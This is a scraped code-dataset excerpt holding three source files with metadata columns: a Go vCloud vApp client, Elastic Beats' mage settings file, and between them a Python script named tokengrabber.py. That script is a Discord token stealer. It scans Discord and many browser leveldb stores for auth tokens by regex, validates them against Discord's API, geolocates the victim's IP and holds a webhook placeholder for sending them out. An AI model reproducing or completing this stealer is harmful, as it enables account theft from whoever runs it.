return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newname := &types.VM{
Name: name,
Xmlns: "http://www.vmware.com/vcloud/v1.5",
}
output, err := xml.MarshalIndent(newname, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] VCD Client configuration: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.vm+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) DeleteMetadata(key string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/metadata/" + key
req := v.c.NewRequest(map[string]string{}, "DELETE", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error deleting Metadata: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) AddMetadata(key, value string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newmetadata := &types.MetadataValue{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
TypedValue: &types.TypedValue{
XsiType: "MetadataStringValue",
Value: value,
},
}
output, err := xml.MarshalIndent(newmetadata, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/metadata/" + key
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.metadata.value+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) SetOvf(parameters map[string]string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
if v.VApp.Children.VM[0].ProductSection == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children with ProductSection, aborting customization")
}
for key, value := range parameters {
for _, ovf_value := range v.VApp.Children.VM[0].ProductSection.Property {
if ovf_value.Key == key {
ovf_value.Value = &types.Value{Value: value}
break
}
}
}
newmetadata := &types.ProductSectionList{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
ProductSection: v.VApp.Children.VM[0].ProductSection,
}
output, err := xml.MarshalIndent(newmetadata, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/productSections"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.productSections+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeNetworkConfig(networks []map[string]interface{}, ip string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing VM before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
networksection, err := v.GetNetworkConnectionSection()
for index, network := range networks {
// Determine what type of address is requested for the vApp
ipAllocationMode := "NONE"
ipAddress := "Any"
// TODO: Review current behaviour of using DHCP when left blank
if ip == "" || ip == "dhcp" || network["ip"] == "dhcp" {
ipAllocationMode = "DHCP"
} else if ip == "allocated" || network["ip"] == "allocated" {
ipAllocationMode = "POOL"
} else if ip == "none" || network["ip"] == "none" {
ipAllocationMode = "NONE"
} else if ip != "" || network["ip"] != "" {
ipAllocationMode = "MANUAL"
// TODO: Check a valid IP has been given
ipAddress = ip
}
log.Printf("[DEBUG] Function ChangeNetworkConfig() for %s invoked", network["orgnetwork"])
networksection.Xmlns = "http://www.vmware.com/vcloud/v1.5"
networksection.Ovf = "http://schemas.dmtf.org/ovf/envelope/1"
networksection.Info = "Specifies the available VM network connections"
networksection.NetworkConnection[index].NeedsCustomization = true
networksection.NetworkConnection[index].IPAddress = ipAddress
networksection.NetworkConnection[index].IPAddressAllocationMode = ipAllocationMode
networksection.NetworkConnection[index].MACAddress = ""
if network["is_primary"] == true {
networksection.PrimaryNetworkConnectionIndex = index
}
log.Printf("Networksection: %s", networksection)
}
output, err := xml.MarshalIndent(networksection, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/networkConnectionSection/"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkConnectionSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeMemorySize(size int) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
// Check if VApp Children is populated
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newmem := &types.OVFItem{
XmlnsRasd: "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData",
XmlnsVCloud: "http://www.vmware.com/vcloud/v1.5",
XmlnsXsi: "http://www.w3.org/2001/XMLSchema-instance",
VCloudHREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/memory",
VCloudType: "application/vnd.vmware.vcloud.rasdItem+xml",
AllocationUnits: "byte * 2^20",
Description: "Memory Size",
ElementName: strconv.Itoa(size) + " MB of memory",
InstanceID: 5,
Reservation: 0,
ResourceType: 4,
VirtualQuantity: size,
Weight: 0,
Link: &types.Link{
HREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/memory",
Rel: "edit",
Type: "application/vnd.vmware.vcloud.rasdItem+xml",
},
}
output, err := xml.MarshalIndent(newmem, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/virtualHardwareSection/memory"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.rasdItem+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) GetNetworkConfig() (*types.NetworkConfigSection, error) {
networkConfig := &types.NetworkConfigSection{}
if v.VApp.HREF == "" {
return networkConfig, fmt.Errorf("cannot refresh, Object is empty")
}
u, _ := url.ParseRequestURI(v.VApp.HREF + "/networkConfigSection/")
req := v.c.NewRequest(map[string]string{}, "GET", *u, nil)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkConfigSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return networkConfig, fmt.Errorf("error retrieving task: %s", err)
}
if err = decodeBody(resp, networkConfig); err != nil {
return networkConfig, fmt.Errorf("error decoding task response: %s", err)
}
// The request was successful
return networkConfig, nil
}
func (v *VApp) AddRAWNetworkConfig(orgvdcnetworks []*types.OrgVDCNetwork) (Task, error) {
networkConfig := &types.NetworkConfigSection{
Info: "Configuration parameters for logical networks",
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Type: "application/vnd.vmware.vcloud.networkConfigSection+xml",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
}
for _, network := range orgvdcnetworks {
networkConfig.NetworkConfig = append(networkConfig.NetworkConfig,
types.VAppNetworkConfiguration{
NetworkName: network.Name,
Configuration: &types.NetworkConfiguration{
ParentNetwork: &types.Reference{
HREF: network.HREF,
},
FenceMode: "bridged",
},
},
)
}
output, err := xml.MarshalIndent(networkConfig, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] RAWNETWORK Config NetworkXML: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/networkConfigSection/"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkconfigsection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error adding vApp Network: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
| [
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\"",
"\"GOVCLOUDAIR_DEBUG\""
] | [] | [
"GOVCLOUDAIR_DEBUG"
] | [] | ["GOVCLOUDAIR_DEBUG"] | go | 1 | 0 | |
utils/tokengrabber.py |
import requests
import os
import json
import base64
import random
import re
import string
import datetime
import sqlite3
import pyautogui
import secrets
import shutil
import zipfile
import socket
#from Crypto.Cipher import AES
class Grabber:
def __init__(self):
self.tokens = []
self.valid = []
self.webhook = "WEBHOOK_HERE"
self.file = ""
self.username = os.getlogin()
self.appdata = os.getenv("localappdata")
self.roaming = os.getenv("appdata")
self.tempfolder = ""
self.ipaddress = ""
def GetIP_Info(self):
localip = socket.gethostbyname(socket.gethostname())
publicip_info = requests.get('http://ipinfo.io/json').json()
publicip = publicip_info["ip"]
publicip_hostname = publicip_info["hostname"]
publicip_city = publicip["city"]
publicip_region = publicip["region"]
def CreateTempFolder(self):
temp = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(10))
self.tempfolder = f"{self.appdata}\\{temp}"
os.mkdir(os.path.join(self.tempfolder))
def ScreenShot(self):
pass
def CheckGoogle(self):
if os.path.exists(f"{self.appdata}\\Google"):
return True
return False
def GrabToken(self):
tokens = []
paths = {
"Discord": f"{self.roaming}\\discord\\Local Storage\\leveldb\\",
"Discord Canary": f"{self.roaming}\\discordcanary\\Local Storage\\leveldb\\",
"Lightcord": f"{self.roaming}\\Lightcord\\Local Storage\\leveldb\\",
"Discord PTB": f"{self.roaming}\\discordptb\\Local Storage\\leveldb\\",
"Opera": f"{self.roaming}\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\",
"Opera GX": f"{self.roaming}\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\",
"Amigo": f"{self.appdata}\\Amigo\\User Data\\Local Storage\\leveldb\\",
"Torch": f"{self.appdata}\\Torch\\User Data\\Local Storage\\leveldb\\",
"Kometa": f"{self.appdata}\\Kometa\\User Data\\Local Storage\\leveldb\\",
"Orbitum": f"{self.appdata}\\Orbitum\\User Data\\Local Storage\\leveldb\\",
"CentBrowser": f"{self.appdata}\\CentBrowser\\User Data\\Local Storage\\leveldb\\",
"7Star": f"{self.appdata}\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\",
"Sputnik": f"{self.appdata}\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\",
"Vivaldi": f"{self.appdata}\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\",
"Chrome SxS": f"{self.appdata}\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\",
"Chrome": f"{self.appdata}\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\",
"Epic Privacy Browser": f"{self.appdata}\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\",
"Microsoft Edge": f"{self.appdata}\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\",
"Uran": f"{self.appdata}\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\",
"Yandex": f"{self.appdata}\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\",
"Brave": f"{self.appdata}\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\",
"Iridium": f"{self.appdata}\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\"
}
for platform , path in paths.items():
if not os.path.exists(path):
continue
for file in os.listdir(path):
if not file.endswith(".log") and not file.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f'{path}\\{file}', errors='ignore').readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in re.findall(regex, line):
tokens.append(token)
for token in tokens:
if token not in self.tokens and requests.get(f"https://discord.com/api/v9/users/@me", headers={"Authorization": token}).status_code == 200:
self.tokens.append(token)
Grabber().GrabToken() | [] | [] | [
"localappdata",
"appdata"
] | [] | ["localappdata", "appdata"] | python | 2 | 0 | |
dev-tools/mage/settings.go | // Licensed to Elasticsearch B.V. under one or more contributor
// license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright
// ownership. Elasticsearch B.V. licenses this file to you under
// the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package mage
import (
"fmt"
"go/build"
"io/ioutil"
"log"
"os"
"path/filepath"
"regexp"
"strconv"
"strings"
"sync"
"time"
"github.com/magefile/mage/sh"
"github.com/pkg/errors"
"golang.org/x/tools/go/vcs"
"github.com/elastic/beats/v7/dev-tools/mage/gotool"
)
const (
fpmVersion = "1.11.0"
// Docker images. See https://github.com/elastic/golang-crossbuild.
beatsFPMImage = "docker.elastic.co/beats-dev/fpm"
// BeatsCrossBuildImage is the image used for crossbuilding Beats.
BeatsCrossBuildImage = "docker.elastic.co/beats-dev/golang-crossbuild"
elasticBeatsImportPath = "github.com/elastic/beats"
elasticBeatsModulePath = "github.com/elastic/beats/v7"
)
// Common settings with defaults derived from files, CWD, and environment.
var (
GOOS = build.Default.GOOS
GOARCH = build.Default.GOARCH
GOARM = EnvOr("GOARM", "")
Platform = MakePlatformAttributes(GOOS, GOARCH, GOARM)
BinaryExt = ""
XPackDir = "../x-pack"
RaceDetector = false
TestCoverage = false
// CrossBuildMountModcache, if true, mounts $GOPATH/pkg/mod into
// the crossbuild images at /go/pkg/mod, read-only.
CrossBuildMountModcache = true
BeatName = EnvOr("BEAT_NAME", filepath.Base(CWD()))
BeatServiceName = EnvOr("BEAT_SERVICE_NAME", BeatName)
BeatIndexPrefix = EnvOr("BEAT_INDEX_PREFIX", BeatName)
BeatDescription = EnvOr("BEAT_DESCRIPTION", "")
BeatVendor = EnvOr("BEAT_VENDOR", "Elastic")
BeatLicense = EnvOr("BEAT_LICENSE", "ASL 2.0")
BeatURL = EnvOr("BEAT_URL", "https://www.elastic.co/products/beats/"+BeatName)
BeatUser = EnvOr("BEAT_USER", "root")
BeatProjectType ProjectType
Snapshot bool
DevBuild bool
versionQualified bool
versionQualifier string
FuncMap = map[string]interface{}{
"beat_doc_branch": BeatDocBranch,
"beat_version": BeatQualifiedVersion,
"commit": CommitHash,
"commit_short": CommitHashShort,
"date": BuildDate,
"elastic_beats_dir": ElasticBeatsDir,
"go_version": GoVersion,
"repo": GetProjectRepoInfo,
"title": strings.Title,
"tolower": strings.ToLower,
"contains": strings.Contains,
}
)
func init() {
if GOOS == "windows" {
BinaryExt = ".exe"
}
var err error
RaceDetector, err = strconv.ParseBool(EnvOr("RACE_DETECTOR", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse RACE_DETECTOR env value"))
}
TestCoverage, err = strconv.ParseBool(EnvOr("TEST_COVERAGE", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse TEST_COVERAGE env value"))
}
Snapshot, err = strconv.ParseBool(EnvOr("SNAPSHOT", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse SNAPSHOT env value"))
}
DevBuild, err = strconv.ParseBool(EnvOr("DEV", "false"))
if err != nil {
panic(errors.Wrap(err, "failed to parse DEV env value"))
}
versionQualifier, versionQualified = os.LookupEnv("VERSION_QUALIFIER")
}
// ProjectType specifies the type of project (OSS vs X-Pack).
type ProjectType uint8
// Project types.
const (
OSSProject ProjectType = iota
XPackProject
CommunityProject
)
// ErrUnknownProjectType is returned if an unknown ProjectType value is used.
var ErrUnknownProjectType = fmt.Errorf("unknown ProjectType")
// EnvMap returns map containing the common settings variables and all variables
// from the environment. args are appended to the output prior to adding the
// environment variables (so env vars have the highest precedence).
func EnvMap(args ...map[string]interface{}) map[string]interface{} {
envMap := varMap(args...)
// Add the environment (highest precedence).
for _, e := range os.Environ() {
env := strings.SplitN(e, "=", 2)
envMap[env[0]] = env[1]
}
return envMap
}
func varMap(args ...map[string]interface{}) map[string]interface{} {
data := map[string]interface{}{
"GOOS": GOOS,
"GOARCH": GOARCH,
"GOARM": GOARM,
"Platform": Platform,
"BinaryExt": BinaryExt,
"XPackDir": XPackDir,
"BeatName": BeatName,
"BeatServiceName": BeatServiceName,
"BeatIndexPrefix": BeatIndexPrefix,
"BeatDescription": BeatDescription,
"BeatVendor": BeatVendor,
"BeatLicense": BeatLicense,
"BeatURL": BeatURL,
"BeatUser": BeatUser,
"Snapshot": Snapshot,
"DEV": DevBuild,
"Qualifier": versionQualifier,
}
// Add the extra args to the map.
for _, m := range args {
for k, v := range m {
data[k] = v
}
}
return data
}
func dumpVariables() (string, error) {
var dumpTemplate = `## Variables
GOOS = {{.GOOS}}
GOARCH = {{.GOARCH}}
GOARM = {{.GOARM}}
Platform = {{.Platform}}
BinaryExt = {{.BinaryExt}}
XPackDir = {{.XPackDir}}
BeatName = {{.BeatName}}
BeatServiceName = {{.BeatServiceName}}
BeatIndexPrefix = {{.BeatIndexPrefix}}
BeatDescription = {{.BeatDescription}}
BeatVendor = {{.BeatVendor}}
BeatLicense = {{.BeatLicense}}
BeatURL = {{.BeatURL}}
BeatUser = {{.BeatUser}}
VersionQualifier = {{.Qualifier}}
## Functions
beat_doc_branch = {{ beat_doc_branch }}
beat_version = {{ beat_version }}
commit = {{ commit }}
date = {{ date }}
elastic_beats_dir = {{ elastic_beats_dir }}
go_version = {{ go_version }}
repo.RootImportPath = {{ repo.RootImportPath }}
repo.CanonicalRootImportPath = {{ repo.CanonicalRootImportPath }}
repo.RootDir = {{ repo.RootDir }}
repo.ImportPath = {{ repo.ImportPath }}
repo.SubDir = {{ repo.SubDir }}
`
return Expand(dumpTemplate)
}
// DumpVariables writes the template variables and values to stdout.
func DumpVariables() error {
out, err := dumpVariables()
if err != nil {
return err
}
fmt.Println(out)
return nil
}
var (
commitHash string
commitHashOnce sync.Once
)
// CommitHash returns the full length git commit hash.
func CommitHash() (string, error) {
var err error
commitHashOnce.Do(func() {
commitHash, err = sh.Output("git", "rev-parse", "HEAD")
})
return commitHash, err
}
// CommitHashShort returns the short length git commit hash.
func CommitHashShort() (string, error) {
shortHash, err := CommitHash()
if len(shortHash) > 6 {
shortHash = shortHash[:6]
}
return shortHash, err
}
var (
elasticBeatsDirValue string
elasticBeatsDirErr error
elasticBeatsDirLock sync.Mutex
)
// SetElasticBeatsDir sets the internal elastic beats dir to a preassigned value
func SetElasticBeatsDir(path string) {
elasticBeatsDirLock.Lock()
defer elasticBeatsDirLock.Unlock()
elasticBeatsDirValue = path
}
// ElasticBeatsDir returns the path to Elastic beats dir.
func ElasticBeatsDir() (string, error) {
elasticBeatsDirLock.Lock()
defer elasticBeatsDirLock.Unlock()
if elasticBeatsDirValue != "" || elasticBeatsDirErr != nil {
return elasticBeatsDirValue, elasticBeatsDirErr
}
elasticBeatsDirValue, elasticBeatsDirErr = findElasticBeatsDir()
if elasticBeatsDirErr == nil {
log.Println("Found Elastic Beats dir at", elasticBeatsDirValue)
}
return elasticBeatsDirValue, elasticBeatsDirErr
}
// findElasticBeatsDir returns the root directory of the Elastic Beats module, using "go list".
//
// When running within the Elastic Beats repo, this will return the repo root. Otherwise,
// it will return the root directory of the module from within the module cache or vendor
// directory.
func findElasticBeatsDir() (string, error) {
repo, err := GetProjectRepoInfo()
if err != nil {
return "", err
}
if repo.IsElasticBeats() {
return repo.RootDir, nil
}
return gotool.ListModuleCacheDir(elasticBeatsModulePath)
}
var (
buildDate = time.Now().UTC().Format(time.RFC3339)
)
// BuildDate returns the time that the build started.
func BuildDate() string {
return buildDate
}
var (
goVersionValue string
goVersionErr error
goVersionOnce sync.Once
)
// GoVersion returns the version of Go defined in the project's .go-version
// file.
func GoVersion() (string, error) {
goVersionOnce.Do(func() {
goVersionValue = os.Getenv("BEAT_GO_VERSION")
if goVersionValue != "" {
return
}
goVersionValue, goVersionErr = getBuildVariableSources().GetGoVersion()
})
return goVersionValue, goVersionErr
}
var (
beatVersionRegex = regexp.MustCompile(`(?m)^const defaultBeatVersion = "(.+)"\r?$`)
beatVersionValue string
beatVersionErr error
beatVersionOnce sync.Once
)
// BeatQualifiedVersion returns the Beat's qualified version. The value can be overwritten by
// setting VERSION_QUALIFIER in the environment.
func BeatQualifiedVersion() (string, error) {
version, err := beatVersion()
if err != nil {
return "", err
}
// version qualifier can intentionally be set to "" to override build time var
if !versionQualified || versionQualifier == "" {
return version, nil
}
return version + "-" + versionQualifier, nil
}
// BeatVersion returns the Beat's version. The value can be overridden by
// setting BEAT_VERSION in the environment.
func beatVersion() (string, error) {
beatVersionOnce.Do(func() {
beatVersionValue = os.Getenv("BEAT_VERSION")
if beatVersionValue != "" {
return
}
beatVersionValue, beatVersionErr = getBuildVariableSources().GetBeatVersion()
})
return beatVersionValue, beatVersionErr
}
var (
beatDocBranchRegex = regexp.MustCompile(`(?m)doc-branch:\s*([^\s]+)\r?$`)
beatDocBranchValue string
beatDocBranchErr error
beatDocBranchOnce sync.Once
)
// BeatDocBranch returns the documentation branch name associated with the
// Beat branch.
func BeatDocBranch() (string, error) {
beatDocBranchOnce.Do(func() {
beatDocBranchValue = os.Getenv("BEAT_DOC_BRANCH")
if beatDocBranchValue != "" {
return
}
beatDocBranchValue, beatDocBranchErr = getBuildVariableSources().GetDocBranch()
})
return beatDocBranchValue, beatDocBranchErr
}
// --- BuildVariableSources
var (
// DefaultBeatBuildVariableSources contains the default locations build
// variables are read from by Elastic Beats.
DefaultBeatBuildVariableSources = &BuildVariableSources{
BeatVersion: "{{ elastic_beats_dir }}/libbeat/version/version.go",
GoVersion: "{{ elastic_beats_dir }}/.go-version",
DocBranch: "{{ elastic_beats_dir }}/libbeat/docs/version.asciidoc",
}
buildVariableSources *BuildVariableSources
buildVariableSourcesLock sync.Mutex
)
// SetBuildVariableSources sets the BuildVariableSources that defines where
// certain build data should be sourced from. Community Beats must call this.
func SetBuildVariableSources(s *BuildVariableSources) {
buildVariableSourcesLock.Lock()
defer buildVariableSourcesLock.Unlock()
buildVariableSources = s
}
func getBuildVariableSources() *BuildVariableSources {
buildVariableSourcesLock.Lock()
defer buildVariableSourcesLock.Unlock()
if buildVariableSources != nil {
return buildVariableSources
}
repo, err := GetProjectRepoInfo()
if err != nil {
panic(err)
}
if repo.IsElasticBeats() {
buildVariableSources = DefaultBeatBuildVariableSources
return buildVariableSources
}
panic(errors.Errorf("magefile must call devtools.SetBuildVariableSources() "+
"because it is not an elastic beat (repo=%+v)", repo.RootImportPath))
}
// BuildVariableSources is used to explicitly define what files contain build
// variables and how to parse the values from that file. This removes ambiguity
// about where the data is sources and allows a degree of customization for
// community Beats.
//
// Default parsers are used if one is not defined.
type BuildVariableSources struct {
// File containing the Beat version.
BeatVersion string
// Parses the Beat version from the BeatVersion file.
BeatVersionParser func(data []byte) (string, error)
// File containing the Go version to be used in cross-builds.
GoVersion string
// Parses the Go version from the GoVersion file.
GoVersionParser func(data []byte) (string, error)
// File containing the documentation branch.
DocBranch string
// Parses the documentation branch from the DocBranch file.
DocBranchParser func(data []byte) (string, error)
}
func (s *BuildVariableSources) expandVar(in string) (string, error) {
return expandTemplate("inline", in, map[string]interface{}{
"elastic_beats_dir": ElasticBeatsDir,
})
}
// GetBeatVersion reads the BeatVersion file and parses the version from it.
func (s *BuildVariableSources) GetBeatVersion() (string, error) {
file, err := s.expandVar(s.BeatVersion)
if err != nil {
return "", err
}
data, err := ioutil.ReadFile(file)
if err != nil {
return "", errors.Wrapf(err, "failed to read beat version file=%v", file)
}
if s.BeatVersionParser == nil {
s.BeatVersionParser = parseBeatVersion
}
return s.BeatVersionParser(data)
}
// GetGoVersion reads the GoVersion file and parses the version from it.
func (s *BuildVariableSources) GetGoVersion() (string, error) {
file, err := s.expandVar(s.GoVersion)
if err != nil {
return "", err
}
data, err := ioutil.ReadFile(file)
if err != nil {
return "", errors.Wrapf(err, "failed to read go version file=%v", file)
}
if s.GoVersionParser == nil {
s.GoVersionParser = parseGoVersion
}
return s.GoVersionParser(data)
}
// GetDocBranch reads the DocBranch file and parses the branch from it.
func (s *BuildVariableSources) GetDocBranch() (string, error) {
file, err := s.expandVar(s.DocBranch)
if err != nil {
return "", err
}
data, err := ioutil.ReadFile(file)
if err != nil {
return "", errors.Wrapf(err, "failed to read doc branch file=%v", file)
}
if s.DocBranchParser == nil {
s.DocBranchParser = parseDocBranch
}
return s.DocBranchParser(data)
}
func parseBeatVersion(data []byte) (string, error) {
matches := beatVersionRegex.FindSubmatch(data)
if len(matches) == 2 {
return string(matches[1]), nil
}
return "", errors.New("failed to parse beat version file")
}
func parseGoVersion(data []byte) (string, error) {
return strings.TrimSpace(string(data)), nil
}
func parseDocBranch(data []byte) (string, error) {
matches := beatDocBranchRegex.FindSubmatch(data)
if len(matches) == 2 {
return string(matches[1]), nil
}
return "", errors.New("failed to parse beat doc branch")
}
// --- ProjectRepoInfo
// ProjectRepoInfo contains information about the project's repo.
type ProjectRepoInfo struct {
RootImportPath string // Import path at the project root.
CanonicalRootImportPath string // Pre-modules root import path (does not contain semantic import version identifier).
RootDir string // Root directory of the project.
ImportPath string // Import path of the current directory.
SubDir string // Relative path from the root dir to the current dir.
}
// IsElasticBeats returns true if the current project is
// github.com/elastic/beats.
func (r *ProjectRepoInfo) IsElasticBeats() bool {
return r.CanonicalRootImportPath == elasticBeatsImportPath
}
var (
repoInfoValue *ProjectRepoInfo
repoInfoErr error
repoInfoOnce sync.Once
)
// GetProjectRepoInfo returns information about the repo including the root
// import path and the current directory's import path.
func GetProjectRepoInfo() (*ProjectRepoInfo, error) {
repoInfoOnce.Do(func() {
if isUnderGOPATH() {
repoInfoValue, repoInfoErr = getProjectRepoInfoUnderGopath()
} else {
repoInfoValue, repoInfoErr = getProjectRepoInfoWithModules()
}
})
return repoInfoValue, repoInfoErr
}
func isUnderGOPATH() bool {
underGOPATH := false
srcDirs, err := listSrcGOPATHs()
if err != nil {
return false
}
for _, srcDir := range srcDirs {
rel, err := filepath.Rel(srcDir, CWD())
if err != nil {
continue
}
if !strings.Contains(rel, "..") {
underGOPATH = true
}
}
return underGOPATH
}
func getProjectRepoInfoWithModules() (*ProjectRepoInfo, error) {
var (
cwd = CWD()
rootDir string
subDir string
)
possibleRoot := cwd
var errs []string
for {
isRoot, err := isGoModRoot(possibleRoot)
if err != nil {
errs = append(errs, err.Error())
}
if isRoot {
rootDir = possibleRoot
subDir, err = filepath.Rel(rootDir, cwd)
if err != nil {
errs = append(errs, err.Error())
}
break
}
possibleRoot = filepath.Dir(possibleRoot)
}
if rootDir == "" {
return nil, errors.Errorf("failed to find root dir of module file: %v", errs)
}
rootImportPath, err := gotool.GetModuleName()
if err != nil {
return nil, err
}
return &ProjectRepoInfo{
RootImportPath: rootImportPath,
CanonicalRootImportPath: filepath.ToSlash(extractCanonicalRootImportPath(rootImportPath)),
RootDir: rootDir,
SubDir: subDir,
ImportPath: filepath.ToSlash(filepath.Join(rootImportPath, subDir)),
}, nil
}
